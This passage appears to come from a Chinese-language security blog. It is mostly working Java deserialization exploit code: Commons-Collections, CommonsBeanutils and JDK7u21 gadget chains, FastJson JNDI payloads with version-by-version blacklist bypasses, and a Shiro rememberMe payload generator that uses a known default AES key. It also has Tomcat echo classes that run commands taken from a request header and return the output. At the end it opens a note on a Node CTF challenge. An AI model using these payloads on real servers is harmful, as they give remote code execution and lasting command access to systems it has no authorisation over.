ChainedTransformer(transformers);        Map innerMap = new HashMap();        innerMap.put("value", "xxxx");        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);        construct.setAccessible(true);        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);        out(handler);    }    public static void CC_LazyMap(Transformer[] transformers) throws Exception {        /*            Gadget chain:                ObjectInputStream.readObject()                    AnnotationInvocationHandler.readObject()                        Map(Proxy).entrySet()                            AnnotationInvocationHandler.invoke()                                LazyMap.get()                                    ChainedTransformer.transform()                                        ConstantTransformer.transform()                                        InvokerTransformer.transform()                                            Method.invoke()                                                Class.getMethod()                                        InvokerTransformer.transform()                                            Method.invoke()                                                Runtime.getRuntime()                                        InvokerTransformer.transform()                                            Method.invoke()                                                Runtime.exec()            Requires:                commons-collections         */        Transformer transformerChain = new ChainedTransformer(transformers);        Map innerMap = new HashMap();        Map outerMap = LazyMap.decorate(innerMap, transformerChain);        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);        construct.setAccessible(true);        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);        // AnnotationInvocationHandler实际上就是一个InvocationHandler        // 我们如果将这个对象用Proxy进行代理，那么在readObject的时候，只要调用任意方法，就会进入到 AnnotationInvocationHandler#invoke 方法中        // 进而触发我们的LazyMap#get,随后的利用链就和TransformedMap的一样了        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler);        handler = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);        out(handler);    }    public static void out(InvocationHandler handler) throws Exception {        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(handler);        oos.close();        System.out.println(barr);        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));        Object o = (Object)ois.readObject();    }}

注意代码注释，TransformedMap这条链在Java8后无法使用，因为反序列化所用到的AnnotationInvocationHandler被改写，LazyMap为改写后的利用方法

CommonCollections2

主要使用PriorityQueue来触发TransformingComparator.compare方法，然后触发ChainedTransformer.transform方法

然而后面有不依靠ChainedTransformer的新利用方法，主要是通过TemplatesImpl来动态加载字节码文件，然后需要newTransformer才能加载恶意类，就利用InvokerTransformer的transform反射触发

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import org.apache.commons.collections4.Transformer;import org.apache.commons.collections4.comparators.TransformingComparator;import org.apache.commons.collections4.functors.ChainedTransformer;import org.apache.commons.collections4.functors.ConstantTransformer;import org.apache.commons.collections4.functors.InvokerTransformer;import org.apache.ibatis.javassist.ClassPool;import org.apache.ibatis.javassist.CtClass;import java.io.*;import java.util.Comparator;import java.util.HashMap;import java.util.Map;import java.util.PriorityQueue;import static com.loader.Reflections.setFieldValue;public class CommonCollections2 {    public static void main(String[] args) throws Exception {        CC_PriorityQueue();    }    public static void CC_PriorityQueue() throws Exception {        Transformer[] fakeTransformers = new Transformer[] {                new ConstantTransformer(1)        };        Transformer[] transformers = new Transformer[]{                new ConstantTransformer(Runtime.class),                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),                new ConstantTransformer(1),        };        Transformer transformerChain = new ChainedTransformer(fakeTransformers);        TransformingComparator comparator = new TransformingComparator(transformerChain);        PriorityQueue queue = new PriorityQueue(2, comparator);        queue.add(1);        queue.add(2);        setFieldValue(transformerChain, "iTransformers", transformers);        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(queue);        oos.close();        System.out.println(barr);        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));        Object o = (Object)ois.readObject();    }    public static void CC_No_Transformer() throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.get(com.loader.HelloTemplatesImpl.class.getName());        TemplatesImpl obj = new TemplatesImpl();        setFieldValue(obj, "_bytecodes", new byte[][]{clazz.toBytecode()});        setFieldValue(obj, "_name", "HelloTemplatesImpl");        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());        Transformer transformer = new InvokerTransformer("toString", null, null);        Comparator comparator = new TransformingComparator(transformer);        PriorityQueue queue = new PriorityQueue(2, comparator);        queue.add(obj);        queue.add(obj);        setFieldValue(transformer, "iMethodName", "newTransformer");        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(queue);        oos.close();        System.out.println(barr);        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));        Object o = (Object)ois.readObject();    }}

HelloTemplatesImpl.java代码，这里恶意必须继承AbstractTranslet，因为反序列化的时候defineTransletClasses函数会判断字节码转化的类是否继承自AbstractTranslet

package com.loader;import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;public class HelloTemplatesImpl extends AbstractTranslet {    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}    public HelloTemplatesImpl() throws IOException {        super();        Runtime.getRuntime().exec("calc.exe");        System.out.println("Hello TemplatesImpl");    }}

CommonCollections3

这条链主要利用的是TiedMapEntry这个Map类，外加TemplatesImpl动态加载字节码

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InstantiateTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.keyvalue.TiedMapEntry;import org.apache.commons.collections.map.LazyMap;import org.apache.commons.collections.map.TransformedMap;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.util.HashMap;import java.util.Map;import org.apache.ibatis.javassist.ClassPool;import org.apache.ibatis.javassist.CtClass;import javax.xml.transform.Templates;import static com.loader.Reflections.setFieldValue;public class CommonCollections3 {    public static void main(String[] args) throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.get(com.loader.HelloTemplatesImpl.class.getName());        TemplatesImpl obj = new TemplatesImpl();        setFieldValue(obj, "_bytecodes", new byte[][] {clazz.toBytecode()});        setFieldValue(obj, "_name", "HelloTemplatesImpl");        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());        Transformer[] fakeTransformers = new Transformer[] {                new ConstantTransformer(1)        };        Transformer[] transformers = new Transformer[]{                new ConstantTransformer(TrAXFilter.class),                new InstantiateTransformer(new Class[] { Templates.class }, new Object[] { obj })        };//        CC_LazyMap(fakeTransformers, transformers);        CC_No_Transformer();    }    public static void CC_TransformedMap(Transformer[] transformers) throws Exception {//        Transformer[] transformers = new Transformer[]{//                new ConstantTransformer(obj),//                new InvokerTransformer("newTransformer", null, null)//        };        Transformer transformerChain = new ChainedTransformer(transformers);        Map innerMap = new HashMap();        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);        outerMap.put("value", "xxxx");  // 手动put触发    }    public static void CC_LazyMap(Transformer[] fakeTransformers, Transformer[] transformers) throws Exception {//        Transformer[] fakeTransformers = new Transformer[] {//                new ConstantTransformer(1)//        };//        Transformer[] transformers = new Transformer[]{//                new ConstantTransformer(TrAXFilter.class),//                new InstantiateTransformer(new Class[] { Templates.class }, new Object[] { obj })//        };        Transformer transformerChain = new ChainedTransformer(fakeTransformers);        HashMap innerMap = new HashMap();        Map outerMap = LazyMap.decorate(innerMap, transformerChain);        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");        HashMap expMap = new HashMap();        expMap.put(tme,"valuevalue");        outerMap.remove("keykey");        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");        f.setAccessible(true);        f.set(transformerChain,transformers);        out(expMap);    }    public static void CC_No_Transformer() throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.get(com.loader.HelloTemplatesImpl.class.getName());        TemplatesImpl obj = new TemplatesImpl();        setFieldValue(obj, "_bytecodes", new byte[][]{clazz.toBytecode()});        setFieldValue(obj, "_name", "HelloTemplatesImpl");        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());        Transformer transformer = new InvokerTransformer("getClass", null, null);        Map innerMap = new HashMap();        Map outerMap = LazyMap.decorate(innerMap, transformer);        TiedMapEntry tme = new TiedMapEntry(outerMap, obj);        Map expMap = new HashMap();        expMap.put(tme, "valuevalue");        outerMap.clear();        setFieldValue(transformer, "iMethodName", "newTransformer");        // ==================        // 生成序列化字符串        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(expMap);        oos.close();        System.out.println(barr);        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));        Object o = (Object)ois.readObject();    }    public static void out(HashMap handler) throws Exception {        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(handler);        oos.close();        System.out.println(barr);        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));        Object o = (Object)ois.readObject();    }}

HelloTemplatesImpl类代码用的就是CC2的代码

CommonCollections6

TiedMapEntry链

import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.keyvalue.TiedMapEntry;import org.apache.commons.collections.map.LazyMap;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.util.HashMap;import java.util.Map;public class CommonCollections6 {    public static void main(String[] args) throws Exception {        Transformer[] fakeTransformers = new Transformer[] {                new ConstantTransformer(1)        };        Transformer[] transformers = new Transformer[]{                new ConstantTransformer(Runtime.class),                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),                new ConstantTransformer(1),        };        Transformer transformerChain = new ChainedTransformer(fakeTransformers);        HashMap innerMap = new HashMap();        Map outerMap = LazyMap.decorate(innerMap, transformerChain);        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");        HashMap expMap = new HashMap();        expMap.put(tme,"valuevalue");        outerMap.remove("keykey");        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");        f.setAccessible(true);        f.set(transformerChain,transformers);        out(expMap);    }    public static void out(HashMap handler) throws Exception {        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(handler);        oos.close();        System.out.println(barr);        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));        Object o = (Object)ois.readObject();    }}

CommonsBeanutils

这条链主要就是BeanComparator这个类的利用了，涉及JavaBean的操作，通过BeanComparator.compare触发PropertyUtils.getProperty进行JavaBean操作，触发TemplatesImpl的getOutputProperties方法，然后newTransformer，之后就是TemplatesImpl动态加载字节码了

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import org.apache.commons.beanutils.BeanComparator;import org.apache.ibatis.javassist.ClassPool;import org.apache.ibatis.javassist.CtClass;import java.io.*;import java.util.PriorityQueue;import static com.loader.Reflections.setFieldValue;public class CommonsBeanutils {    public static void main(String[] args) throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.get(com.loader.HelloTemplatesImpl.class.getName());        TemplatesImpl obj = new TemplatesImpl();        setFieldValue(obj, "_bytecodes", new byte[][] {clazz.toBytecode()});        setFieldValue(obj, "_name", "HelloTemplatesImpl");        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);        queue.add("1");        queue.add("1");        setFieldValue(comparator, "property", "outputProperties");        setFieldValue(queue, "queue", new Object[]{obj, obj});        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(queue);        oos.close();        System.out.println(barr);        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));        Object o = (Object)ois.readObject();    }}

FastJson

DNSLOG

判断是否存在FastJson反序列化漏洞

{"xxx":{"@type":"java.net.Inet4Address","val":"l42dtg.dnslog.cn"}}

1.2.24

实际上利用的是lookup函数来进行JNDI注入

编写一个恶意类Evil.java

import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;public class Evil extends AbstractTranslet {    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { }    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { }    public Evil() throws IOException {        Runtime.getRuntime().exec("calc.exe");    }}

javac编译成class文件，然后python -m http.server起一个http服务来供RMI服务来加载恶意类，使用marshalsec这个工具来起一个RMI服务

项目地址：https://github.com/mbechler/marshalsec

java -cp .\marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8000/#Evil

然后漏洞触发代码

package com.FastJson_1_2_24;import com.alibaba.fastjson.JSON;import com.sun.rowset.JdbcRowSetImpl;public class Rmi_Poc {    public static void main(String[] args) {        String PoC = "{\"xxx\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:1099/calc\", \"autoCommit\":true}}";        JSON.parse(PoC);    }}

@type：指定恶意利用类 com.sun.rowset.JdbcRowSetImpl
dataSourceName ：指定RMI / LDAP 恶意服务器，并调用setDataSourceName 函数
autoCommit：调用 setAutoCommit 函数

1.2.25-1.2.41

{"xxx":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://127.0.0.1:1099/calc", "autoCommit":true}}

问题出在TypeUtils.loadClass,如果类名以L开头;结尾，就会删除掉开头和结尾得到新的类名，以新类名作为参数递归调用loadClass函数，最终加载JdbcRowSetImpl并返回，后续利用过程同上

1.2.42

绕过方式为类名开头两个L，结尾两个;，这样删除一次开头结尾后的类名为Lcom.sun.rowset.JdbcRowSetImpl;，不会触发黑名单。

{"xxx":{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://127.0.0.1:1099/calc", "autoCommit":true}}

1.2.43

{"xxx":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://127.0.0.1:1099/calc", "autoCommit":true}}

1.2.44-1.2.45

有限制，需要使用MyBatis

{"xxx":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://127.0.0.1:1099/Exploit"}}}

1.2.46-1.2.47

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}

目前分析到这，后面再加

Shiro

shiro反序列化漏洞这个问题主要出在rememberMe这个cookie参数，是一个记住我的功能，用户登陆成功后会生成经过加密并编码的cookie，在服务端接收cookie值后，Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥，就可以构造一个恶意对象，对其进行序列化–>AES加密–>Base64编码，然后将其作为cookie的rememberMe字段发送，Shiro将rememberMe进行解密并且反序列化，最终造成反序列化漏洞。

起一个shiro tomcat，代码都在这：https://github.com/phith0n/JavaThings

先写个恶意类Evil.java

package com.govuln.shiroattack;import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class Evil extends AbstractTranslet {    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}    public Evil() throws Exception {        super();        System.out.println("Hello TemplatesImpl");        Runtime.getRuntime().exec("calc.exe");    }}

CommonsCollectionsShiro

用的CC链触发，需要构造不含数组的反序列化Gadget

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import javassist.ClassPool;import javassist.CtClass;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.keyvalue.TiedMapEntry;import org.apache.commons.collections.map.LazyMap;import org.apache.shiro.crypto.AesCipherService;import org.apache.shiro.util.ByteSource;import java.io.ByteArrayOutputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.util.HashMap;import java.util.Map;public class CommonsCollectionsShiro {    public static void main(String []args) throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName());        byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode());        AesCipherService aes = new AesCipherService();        byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");        ByteSource ciphertext = aes.encrypt(payloads, key);        System.out.printf(ciphertext.toString());    }    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {        Field field = obj.getClass().getDeclaredField(fieldName);        field.setAccessible(true);        field.set(obj, value);    }    public byte[] getPayload(byte[] clazzBytes) throws Exception {        TemplatesImpl obj = new TemplatesImpl();        setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});        setFieldValue(obj, "_name", "HelloTemplatesImpl");        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());        Transformer transformer = new InvokerTransformer("getClass", null, null);        Map innerMap = new HashMap();        Map outerMap = LazyMap.decorate(innerMap, transformer);        TiedMapEntry tme = new TiedMapEntry(outerMap, obj);        Map expMap = new HashMap();        expMap.put(tme, "valuevalue");        outerMap.clear();        setFieldValue(transformer, "iMethodName", "newTransformer");        // ==================        // 生成序列化字符串        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(expMap);        oos.close();        return barr.toByteArray();    }}

CommonsBeanutilsShiro

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import javassist.ClassPool;import javassist.CtClass;import org.apache.commons.beanutils.BeanComparator;import org.apache.shiro.crypto.AesCipherService;import org.apache.shiro.util.ByteSource;import java.io.ByteArrayOutputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.util.PriorityQueue;public class CommonsBeanutilsShiro {    public static void main(String []args) throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.get(tomcat89Shiro.class.getName());        byte[] payloads = new CommonsBeanutilsShiro().getPayload(clazz.toBytecode());        AesCipherService aes = new AesCipherService();        byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");        ByteSource ciphertext = aes.encrypt(payloads, key);        System.out.printf(ciphertext.toString());    }    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {        Field field = obj.getClass().getDeclaredField(fieldName);        field.setAccessible(true);        field.set(obj, value);    }    public byte[] getPayload(byte[] clazzBytes) throws Exception {        TemplatesImpl obj = new TemplatesImpl();        setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});        setFieldValue(obj, "_name", "HelloTemplatesImpl");        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);        // stub data for replacement later        queue.add("1");        queue.add("1");        setFieldValue(comparator, "property", "outputProperties");        setFieldValue(queue, "queue", new Object[]{obj, obj});        // ==================        // 生成序列化字符串        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(queue);        oos.close();        return barr.toByteArray();    }}

Tomcat7回显

import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import org.apache.tomcat.util.buf.ByteChunk;import java.lang.reflect.Field;import java.util.ArrayList;import java.io.*;import org.apache.coyote.Request;public class tomcat7Shiro extends AbstractTranslet {    public tomcat7Shiro(){        try {            ThreadGroup group = Thread.currentThread().getThreadGroup();            Field field = group.getClass().getDeclaredField("threads");            field.setAccessible(true);            Thread[] threads = (Thread[]) field.get(group);            for(Thread thread:threads){                String name = thread.getName();                if(name.contains("http") && name.contains("Acceptor")){                    field = thread.getClass().getDeclaredField("target");                    field.setAccessible(true);                    Object obj = field.get(thread);                    field = obj.getClass().getDeclaredField("this$0");                    field.setAccessible(true);                    obj = field.get(obj);                    field = obj.getClass().getDeclaredField("handler");                    field.setAccessible(true);                    obj = field.get(obj);                    field = obj.getClass().getSuperclass().getDeclaredField("global");                    field.setAccessible(true);                    obj = field.get(obj);                    field = obj.getClass().getDeclaredField("processors");                    field.setAccessible(true);                    obj = field.get(obj);                    ArrayList processors = (ArrayList) obj;                    for(int m=0;m<processors.size();m++){                        Object o = processors.get(m);                        if(o != null && o.getClass().toString().contains("RequestInfo")){                            field = o.getClass().getDeclaredField("req");                            field.setAccessible(true);                            obj = field.get(o);                            if(!obj.toString().contains("null")) {                                Request request = (Request) obj;                                String cmd = request.getHeader("cmd");                                InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();                                ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();                                byte[] buff = new byte[1024];                                int rc = 0;                                while ((rc = in.read(buff, 0, 1024)) > 0) {                                    byteArrayOutputStream.write(buff, 0, rc);                                }                                byte[] buf = byteArrayOutputStream.toByteArray();                                ByteChunk bc = new ByteChunk();                                bc.setBytes(buf, 0, buf.length);                                request.getResponse().doWrite(bc);                            }                        }                    }                }            }        }catch (Exception e){            e.printStackTrace();        }    }    @Override    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {    }    @Override    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {    }}

Tomcat8/9回显

import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.lang.reflect.Field;import java.nio.ByteBuffer;import java.util.ArrayList;import org.apache.coyote.Request;import java.io.*;public class tomcat89Shiro extends AbstractTranslet {    public tomcat89Shiro(){        try {            ThreadGroup group = Thread.currentThread().getThreadGroup();            Field field = group.getClass().getDeclaredField("threads");            field.setAccessible(true);            Thread[] threads = (Thread[]) field.get(group);            for(Thread thread:threads){                String name = thread.getName();                if(name.contains("http") && name.contains("Poller")){                    field = thread.getClass().getDeclaredField("target");                    field.setAccessible(true);                    Object obj = field.get(thread);                    field = obj.getClass().getDeclaredField("this$0");                    field.setAccessible(true);                    obj = field.get(obj);                    field = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");                    field.setAccessible(true);                    obj = field.get(obj);                    field = obj.getClass().getDeclaredField("global");                    field.setAccessible(true);                    obj = field.get(obj);                    field = obj.getClass().getDeclaredField("processors");                    field.setAccessible(true);                    obj = field.get(obj);                    ArrayList processors = (ArrayList) obj;                    for(int m=0;m<processors.size();m++){                        Object o = processors.get(m);                        if(o != null && o.getClass().toString().contains("RequestInfo")){                            field = o.getClass().getDeclaredField("req");                            field.setAccessible(true);                            obj = field.get(o);                            if(!obj.toString().contains("null")) {                                Request request = (Request) obj;                                String cmd = request.getHeader("cmd");                                InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();                                ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();                                byte[] buff = new byte[1024];                                int rc = 0;                                while ((rc = in.read(buff, 0, 1024)) > 0) {                                    byteArrayOutputStream.write(buff, 0, rc);                                }                                byte[] buf = byteArrayOutputStream.toByteArray();                                request.getResponse().doWrite(ByteBuffer.wrap(buf));                            }                        }                    }                }            }        }catch (Exception e){            e.printStackTrace();        }    }    @Override    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {    }    @Override    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {    }}

回显这里可以参考以下文章思路

JDK7u21原生链

Evil.java

package com.rce;import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class Evil extends AbstractTranslet {    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}    public Evil() throws Exception {        super();        System.out.println("Hello TemplatesImpl");        Runtime.getRuntime().exec("calc.exe");    }}

rce代码如下

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import javassist.ClassPool;import javassist.CtClass;import javax.xml.transform.Templates;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.util.HashMap;import java.util.HashSet;import java.util.LinkedHashSet;import java.util.Map;public class rce {    public static void main(String[] args) throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.get(Evil.class.getName());        TemplatesImpl obj = new TemplatesImpl();        setFieldValue(obj, "_bytecodes", new byte[][] {clazz.toBytecode()});        setFieldValue(obj, "_name", "HelloTemplatesImpl");        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());        String zeroHashCodeStr = "f5a5a608";        // 实例化一个map，并添加Magic Number为key，也就是f5a5a608，value先随便设置一个值        HashMap map = new HashMap();        map.put(zeroHashCodeStr, "foo");        // 实例化AnnotationInvocationHandler类        Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);        handlerConstructor.setAccessible(true);        InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map);        // 为tempHandler创造一层代理        Templates proxy = (Templates) Proxy.newProxyInstance(rce.class.getClassLoader(), new Class[]{Templates.class}, tempHandler);        // 实例化HashSet，并将两个对象放进去        HashSet set = new LinkedHashSet();        set.add(obj);        set.add(proxy);        // 将恶意templates设置到map中        map.put(zeroHashCodeStr, obj);        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(barr);        oos.writeObject(set);        oos.close();        System.out.println(barr);        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));        Object o = (Object)ois.readObject();    }    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {        Field field = obj.getClass().getDeclaredField(fieldName);        field.setAccessible(true);        field.set(obj, value);    }}

参考

参考的太多了，除了文中列举的，总结个大概

P🐮的知识星球的文章，CC链主要参考《Java安全漫谈》系列，Fastjson参考星球上《FastJson安全入门初探》
部分理解来自H0t-A1r-B4llo0n师傅博客：https://www.guildhab.top/
另外还有先知上的文章就不一一列举了

感谢师傅们！

记几道JavaScript题

2021-08-17T09:16:07.000Z

Tip：npm audit，Run a security audit

[GYCTF2020]Node Game

题目链接：https://buuoj.cn/challenges#[GYCTF2020]Node%20Game

比赛的时候好像有个提示：Node 版本为 8.12.0

这题主要考的是node代审、SSRF和请求夹带（http走私）

